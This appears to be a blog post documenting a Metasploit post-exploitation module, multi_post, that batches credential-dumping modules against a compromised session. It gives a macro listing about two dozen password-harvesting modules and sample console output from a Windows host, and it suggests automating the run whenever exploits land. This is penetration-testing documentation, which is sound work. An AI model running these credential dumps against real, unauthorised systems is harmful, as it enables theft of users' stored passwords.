Running MultiplePost Modules
A Module I wrote to simplify the running of multiple post modules against a session for users that did not want to learn how to code ruby or wanted to learn the API to build a resource file to achieve this could use something simpler for them to achieve this task. The module is called multi_post. Lets load the module and see the options it has:
msf > use post/multi/manage/multi_post
msf post(multi_post) > info
Name: Multi Manage Post Module Macro Execution
Module: post/multi/manage/multi_post
Version: 14287
Platform: Windows, Unix, OSX, Linux, Solaris
Arch:
Rank: Normal
Provided by:
carlos_perez <carlos_perez@darkoperator.com>
Description:
This module will execute a list of modules given in a macro file in
the format of < module > < opt=val,opt=val > against the select session
checking for compatibility of the module against the sessions and
validation of the options provided.
msf post(multi_post) > show options
Module options (post/multi/manage/multi_post):
Name Current Setting Required Description
---- --------------- -------- -----------
MACRO yes File with Post Modules and Options to run in the session
SESSION yes The session to run this module on.
As we can see it takes a macro file where each post module and its options are written one per line in the format of < module > < opt=val,opt=val > lets create a macro for running all password dumping credentials. The Macro would look something like this:
post/windows/gather/credentials/wsftp_client
post/windows/gather/credentials/winscp
post/windows/gather/credentials/windows_autologin
post/windows/gather/credentials/vnc
post/windows/gather/credentials/trillian
post/windows/gather/credentials/total_commander
post/windows/gather/credentials/smartftp
post/windows/gather/credentials/outlook
post/windows/gather/credentials/nimbuzz
post/windows/gather/credentials/mremote
post/windows/gather/credentials/imail
post/windows/gather/credentials/idm
post/windows/gather/credentials/flashfxp
post/windows/gather/credentials/filezilla_server
post/windows/gather/credentials/meebo
post/windows/gather/credentials/coreftp
post/windows/gather/credentials/imvu
post/windows/gather/credentials/epo_sql
post/windows/gather/enum_ie
post/multi/gather/ssh_creds
post/multi/gather/pidgin_cred
post/multi/gather/firefox_creds
post/multi/gather/filezilla_client_cred
Now we save the file as cred_dump.rc and so we can use it in the module:
msf post(multi_post) > set MACRO /Users/carlos/cred_dump.rc
MACRO => /Users/carlos/cred_dump.rc
msf post(multi_post) > set SESSION 1
SESSION => 1
msf post(multi_post) > run
[*] Running module against WIN2K8R2-01
Loading post/windows/gather/credentials/wsftp_client
Running Against 1
[*] Checking Default Locations...
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....
Loading post/windows/gather/credentials/winscp
Running Against 1
[*] Looking for WinSCP.ini file storage...
[*] WinSCP.ini file NOT found...
[*] Looking for Registry Storage...
[*] No WinSCP Registry Keys found!
[*] Done!
Loading post/windows/gather/credentials/windows_autologin
Running Against 1
[*] Running against WIN2K8R2-01 on session 1
[-] Post failed: NameError undefined local variable or method `d02' for #<#<Module:0x007fc88b0c0e78>::Metasploit3:0x007fc88fd80898>
[-] Call stack:
[-] /Users/carlos/Development/msf4/modules/post/windows/gather/credentials/windows_autologin.rb:95:in `run'
Loading post/windows/gather/credentials/vnc
Running Against 1
[*] Enumerating VNC passwords on WIN2K8R2-01
[*] Checking UltraVNC...
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[*] Checking TightVNC_HKLM_Control_pass...
[*] Checking RealVNC_S-1-5-21-3759490038-1939265364-4245280780-500...
[*] Checking WinVNC4_S-1-5-21-3759490038-1939265364-4245280780-500...
[*] Checking WinVNC_S-1-5-21-3759490038-1939265364-4245280780-500_Default...
[*] Checking WinVNC3_S-1-5-21-3759490038-1939265364-4245280780-500_Default...
[*] Checking WinVNC3_S-1-5-21-3759490038-1939265364-4245280780-500...
. . . . . .
[*] Checking for Firefox directory in: C:\Users\Administrator\AppData\Roaming\Mozilla\
[-] Firefox not found
Loading post/multi/gather/filezilla_client_cred
Running Against 1
[*] Checking for Filezilla directory in: C:\Users\Administrator\AppData\Roaming
[*] No users found with a FileZilla directory
[*] Post module execution completed
msf post(multi_post) >
As we can see this can be helpful if one wants to create quick macro files to run collections of post modules and use them in automated fashion like with AutoRunScript for when running exploits or setting a multi handler.
As always I hope you find this information useful.
Reader Comments (1)
- Kevin Weiss